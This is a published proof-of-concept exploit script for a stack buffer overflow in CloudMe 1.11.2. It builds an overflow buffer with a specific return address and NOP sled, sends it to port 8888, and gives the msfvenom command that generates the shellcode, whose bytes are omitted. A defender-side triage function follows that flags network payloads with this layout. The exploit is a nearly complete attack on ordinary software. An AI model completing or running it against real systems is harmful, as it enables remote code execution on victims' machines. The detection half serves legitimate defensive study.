Published on April 28th, 2020

CloudMe 1.11.2 Buffer Overflow

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b""  # shellcode bytes produced by the msfvenom command above are omitted here

overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    # sys was never imported and sys.exc_value does not exist in Python 3
    print(e)
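
Added example, not part of the original PoC: a defender-side triage function that checks a captured TCP payload sent to port 8888 for the layout the script above builds (a long single-byte filler followed by a 4-byte value at offset 1052). The function names, the 64-byte run threshold and the sample buffers are assumptions constructed for illustration; 0xCC bytes stand in for the shellcode.

```python
import struct
from itertools import groupby

CLOUDME_PORT = 8888      # port the PoC connects to
OFFSET_TO_EIP = 1052     # filler length the PoC sends before the return address
MIN_FILLER_RUN = 64      # assumed threshold: repeated-byte run treated as filler


def longest_run(data: bytes) -> tuple:
    """Return (byte_value, length) of the longest run of one repeated byte."""
    best = (0, 0)
    for value, group in groupby(data):
        length = sum(1 for _ in group)
        if length > best[1]:
            best = (value, length)
    return best


def triage(dst_port: int, data: bytes) -> dict:
    """Describe why a captured TCP payload resembles the PoC buffer, if it does."""
    report = {"suspicious": False, "reasons": [], "return_address": None}
    if dst_port != CLOUDME_PORT:
        return report
    value, length = longest_run(data)
    if length >= MIN_FILLER_RUN:
        report["reasons"].append(f"{length}-byte run of 0x{value:02X}")
    if len(data) >= OFFSET_TO_EIP + 4:
        # x86 is little-endian, so the 4 bytes after the filler are the
        # value that would be loaded into EIP.
        (addr,) = struct.unpack_from("<I", data, OFFSET_TO_EIP)
        report["return_address"] = f"0x{addr:08X}"
        report["reasons"].append("payload reaches the saved return address")
    # Require both signals before flagging, to limit false positives.
    report["suspicious"] = len(report["reasons"]) == 2
    return report


# Constructed samples: the PoC's layout with 0xCC standing in for shellcode,
# and a short benign-looking message.
poc_like = (b"\x90" * 1052 + bytes.fromhex("B542A868") + b"\x90" * 30
            + b"\xCC" * 200 + b"C" * 214)
benign = b"constructed short message"

if __name__ == "__main__":
    print(triage(CLOUDME_PORT, poc_like))
    print(triage(CLOUDME_PORT, benign))
```

The decoded `return_address` gives an analyst the value to compare against the loaded modules of the affected host when confirming an attempt.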